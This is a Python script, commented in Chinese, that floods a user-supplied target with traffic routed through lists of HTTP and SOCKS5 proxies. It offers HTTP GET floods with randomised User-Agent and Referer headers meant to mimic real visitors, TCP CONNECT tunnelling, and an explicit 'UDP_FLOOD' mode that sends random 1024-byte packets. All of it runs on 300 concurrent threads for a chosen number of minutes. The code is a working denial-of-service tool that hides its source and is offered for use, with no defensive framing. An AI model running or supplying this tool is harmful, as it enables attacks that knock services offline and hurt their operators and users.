import requests
import concurrent.futures
import time
import os
import threading
import socket
import socks
import random # NEW: 导入 random 库以增加随机性
# --- 配置参数 ---
# HTTP/TCP 模式使用的代理文件路径
INPUT_HTTP_PROXY_FILE = 'working_proxies.txt'
# UDP 模式使用的 SOCKS5 代理文件路径
INPUT_SOCKS5_PROXY_FILE = 'working_socks5_proxies.txt'
# 单次请求的超时时间(秒)
TIMEOUT = 10
# 最大并发线程数 (应设置得较高,以达到最大访问量)
MAX_WORKERS = 300
# 任务提交的随机延迟范围(秒)。例如 0.005 到 0.05 秒,用于模拟不规律的点击间隔。
MIN_SUBMISSION_DELAY = 0.005
MAX_SUBMISSION_DELAY = 0.05
# ------------------
# 线程安全的计数器
success_count = 0
fail_count = 0
lock = threading.Lock()
# 动态配置变量(在运行时由用户输入设置)
TARGET_HOST = None
TARGET_PORT = None
TARGET_URL = None
ACCESS_MODE = None
RUN_DURATION_SECONDS = 0
# 常用且真实的 User-Agent 列表 (用于模拟不同的浏览器)
USER_AGENTS = [
'Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 10_15_7) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Safari/537.36',
'Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:127.0) Gecko/20100101 Firefox/127.0',
'Mozilla/5.0 (Macintosh; Intel Mac OS X 14.5; rv:127.0) Gecko/20100101 Firefox/127.0',
'Mozilla/5.0 (iPhone; CPU iPhone OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
'Mozilla/5.0 (iPad; CPU OS 17_0 like Mac OS X) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/17.0 Mobile/15E148 Safari/604.1',
'Mozilla/5.0 (Linux; Android 14) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/129.0.0.0 Mobile Safari/537.36',
]
# 随机 Referer 列表 (模拟请求来源)
REFERERS = [
'https://www.google.com/',
'https://www.bing.com/',
'https://duckduckgo.com/',
'https://t.co/', # 模拟 Twitter/X 跳转
'https://www.facebook.com/',
'https://www.reddit.com/',
'https://www.zhihu.com/',
'https://t.cn/', # 模拟微博短链
'https://news.baidu.com/',
'http://localhost/', # 模拟内部链接
'https://www.wikipedia.org/'
]
def load_proxies(file_path):
"""从文件加载代理列表,返回 IP:PORT 列表"""
if not os.path.exists(file_path):
print(f"❌ 错误: 找不到代理文件: {file_path}")
return []
with open(file_path, 'r') as f:
proxies = [p.strip() for p in f.readlines() if p.strip()]
if not proxies:
print("❌ 错误: 代理文件中没有有效数据。")
return proxies
def visit_target(proxy, request_id):
"""通过指定的代理或直接访问目标 URL"""
global success_count, fail_count, TARGET_URL, ACCESS_MODE, TIMEOUT, TARGET_HOST, TARGET_PORT
if not ACCESS_MODE:
with lock:
fail_count += 1
return
# --- 模式 1: HTTP GET 请求 (使用 requests) ---
if ACCESS_MODE == 'HTTP_GET':
if not TARGET_URL:
with lock: fail_count += 1
return
try:
proxy_ip, proxy_port = proxy.split(':')
except ValueError:
proxy_ip, proxy_port = "Invalid", 0
proxies = {
'http': f'http://{proxy}',
'https': f'http://{proxy}',
}
# NEW: 随机化请求头 (Randomize headers)
headers = {
'User-Agent': random.choice(USER_AGENTS), # 随机选择一个User-Agent
'Accept': 'text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8',
'Accept-Language': 'zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3', # 模拟接受中文/英文
'Connection': 'keep-alive',
'Upgrade-Insecure-Requests': '1',
'Referer': random.choice(REFERERS) # NEW: 随机的 Referer
}
try:
# 发送请求
response = requests.get(
TARGET_URL,
proxies=proxies,
timeout=TIMEOUT,
headers=headers, # 使用随机化后的请求头
verify=False # 禁用SSL验证
)
# 检查响应状态码
if response.status_code < 500:
with lock:
success_count += 1
else:
with lock:
success_count += 1
except requests.exceptions.RequestException:
with lock:
fail_count += 1
except Exception:
with lock:
fail_count += 1
# --- 模式 2: 裸 TCP 连接测试 (使用 socket) ---
elif ACCESS_MODE == 'TCP_CONNECT':
if not TARGET_HOST or not TARGET_PORT:
with lock: fail_count += 1
return
try:
proxy_ip, proxy_port = proxy.split(':')
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(TIMEOUT)
# 尝试连接代理本身
s.connect((proxy_ip, int(proxy_port)))
# 如果连接成功,尝试发送 HTTP CONNECT 请求(隧道建立)
# 虽然是TCP连接,但我们依然可以随机化User-Agent,以防部分代理检查
user_agent = random.choice(USER_AGENTS)
connect_request = f"CONNECT {TARGET_HOST}:{TARGET_PORT} HTTP/1.1\r\nHost: {TARGET_HOST}\r\nUser-Agent: {user_agent}\r\n\r\n"
s.sendall(connect_request.encode('utf-8'))
# 接收响应
response = s.recv(4096).decode('utf-8')
s.close()
# 检查代理是否返回 200 Connection established
if "200 Connection established" in response:
with lock:
success_count += 1
else:
with lock:
fail_count += 1
except Exception:
with lock:
fail_count += 1
# --- 模式 3: UDP FLOOD (通过 SOCKS5 代理发送) ---
elif ACCESS_MODE == 'UDP_FLOOD':
if not TARGET_HOST or not TARGET_PORT:
with lock: fail_count += 1
return
try:
# 1. 拆分 SOCKS5 代理信息
proxy_ip, proxy_port = proxy.split(':')
# 2. 创建 SOCKS 代理套接字 (使用 SOCK_DGRAM 进行 UDP)
s = socks.socksocket(socket.AF_INET, socket.SOCK_DGRAM)
s.set_proxy(socks.SOCKS5, proxy_ip, int(proxy_port))
s.settimeout(TIMEOUT)
# 简单负载 (1024 字节)
payload = os.urandom(1024)
# 3. 发送数据包。socks.sendto 会通过 SOCKS5 代理的 UDP 中继进行转发
s.sendto(payload, (TARGET_HOST, TARGET_PORT))
s.close()
with lock:
success_count += 1
except Exception:
with lock:
fail_count += 1
else:
# 模式错误处理
print(f"警告: 无效的 ACCESS_MODE: {ACCESS_MODE}")
with lock:
fail_count += 1
def batch_visit(proxies):
"""批量执行并发访问任务,持续指定时长"""
global ACCESS_MODE, success_count, fail_count, MAX_WORKERS, RUN_DURATION_SECONDS
run_duration_seconds = RUN_DURATION_SECONDS
start_time = time.time()
end_time = start_time + run_duration_seconds
total_requests_submitted = 0
if len(proxies) == 0:
print("没有可用的代理,无法执行任务。程序终止。")
return
print(f"开始持续访问任务。目标时长: {run_duration_seconds / 60:.1f} 分钟, 访问模式: {ACCESS_MODE}, 并发数: {MAX_WORKERS}")
stop_monitoring = threading.Event()
def monitor_status():
"""实时监控任务状态"""
while not stop_monitoring.is_set():
time.sleep(1) # 每 1 秒更新一次
completed_tasks = success_count + fail_count
elapsed_time = time.time() - start_time
rps = completed_tasks / elapsed_time if elapsed_time > 0 else 0
# 实时进度输出
progress_line = (
f"\r[运行中] 持续时间: {elapsed_time:.1f}s / {run_duration_seconds}s | "
f"已提交: {total_requests_submitted} | 成功: {success_count} | 失败: {fail_count} | RPS: {rps:.2f} req/s"
)
print(progress_line, end="", flush=True)
monitor_thread = threading.Thread(target=monitor_status)
monitor_thread.start()
try:
with concurrent.futures.ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
i = 0
num_proxies = len(proxies)
# 持续提交循环
while time.time() < end_time:
# 循环使用代理列表
proxy_to_use = proxies[i % num_proxies]
# 提交任务
executor.submit(visit_target, proxy_to_use, i + 1)
i += 1
total_requests_submitted = i
# NEW: 引入随机提交延迟,模拟用户操作的不规律性
sleep_time = random.uniform(MIN_SUBMISSION_DELAY, MAX_SUBMISSION_DELAY)
time.sleep(sleep_time)
# 任务提交时间结束
print(f"\n[时间到] 任务提交停止。已提交 {total_requests_submitted} 个请求。等待运行中的任务完成...")
finally:
# 确保监控线程停止
stop_monitoring.set()
if monitor_thread.is_alive():
monitor_thread.join()
# 3. 结果总结
end_time_final = time.time()
total_time = end_time_final - start_time
final_rps = (success_count + fail_count) / total_time if total_time > 0 else 0
print("\n--- 任务总结 ---")
print(f"总运行时间: {total_time:.2f} 秒 (包含提交期和清理期)")
print(f"总请求提交数: {total_requests_submitted}")
print(f"成功访问数: {success_count}")
print(f"失败数: {fail_count}")
print(f"平均速度 (RPS): {final_rps:.2f} 请求/秒")
if __name__ == '__main__':
# 1. 代理列表和模式初始化
working_proxies = []
# --- 交互式配置 ---
print("\n--- 访问模式选择 ---")
print("1. HTTP/HTTPS GET 请求 (通过 HTTP 代理访问 Web 服务)")
print("2. TCP CONNECT 隧道连接 (通过 HTTP 代理连接 IP:PORT)")
print("3. UDP FLOOD (通过 SOCKS5 代理连接 IP:PORT)")
mode_choice = input("请选择访问模式 (输入 1, 2 或 3): ").strip()
# 根据模式加载不同的代理文件
if mode_choice == '1' or mode_choice == '2':
working_proxies = load_proxies(INPUT_HTTP_PROXY_FILE)
print(f"\n已加载 {len(working_proxies)} 个 HTTP 代理。")
if not working_proxies:
print("HTTP/TCP 模式需要有效代理列表,但列表为空。程序终止。")
exit()
elif mode_choice == '3':
working_proxies = load_proxies(INPUT_SOCKS5_PROXY_FILE)
print(f"\n已加载 {len(working_proxies)} 个 SOCKS5 代理。")
if not working_proxies:
print("UDP_FLOOD 模式需要有效 SOCKS5 代理列表,但列表为空。程序终止。")
exit()
else:
print("输入无效,程序终止。")
exit()
# --- 设置模式和目标 ---
if mode_choice == '1':
ACCESS_MODE = 'HTTP_GET'
TARGET_URL = input("请输入目标 URL (例如 http://httpbin.org/ip): ").strip() # 默认目标改为httpbin
elif mode_choice == '2':
ACCESS_MODE = 'TCP_CONNECT'
target_input = input("请输入目标 IP:PORT (例如 192.168.1.1:8080): ").strip()
try:
TARGET_HOST, TARGET_PORT = target_input.split(':')
TARGET_PORT = int(TARGET_PORT)
except ValueError:
print("目标格式错误。请确保输入格式为 IP:PORT。程序终止。")
exit()
elif mode_choice == '3':
ACCESS_MODE = 'UDP_FLOOD'
target_input = input("请输入目标 IP:PORT (例如 192.168.1.1:53): ").strip()
try:
TARGET_HOST, TARGET_PORT = target_input.split(':')
TARGET_PORT = int(TARGET_PORT)
except ValueError:
print("目标格式错误。请确保输入格式为 IP:PORT。程序终止。")
exit()
# --- 设置运行时间 ---
try:
duration_minutes = input("请输入持续访问时长(分钟,例如 5):").strip()
RUN_DURATION_SECONDS = int(duration_minutes) * 60
if RUN_DURATION_SECONDS <= 0:
print("持续时长必须大于 0,程序终止。")
exit()
except ValueError:
print("无效的时长输入,程序终止。")
exit()
print(f"目标: {TARGET_HOST}:{TARGET_PORT}" if ACCESS_MODE != 'HTTP_GET' else f"目标 URL: {TARGET_URL}")
# 2. 批量并发访问
batch_visit(working_proxies)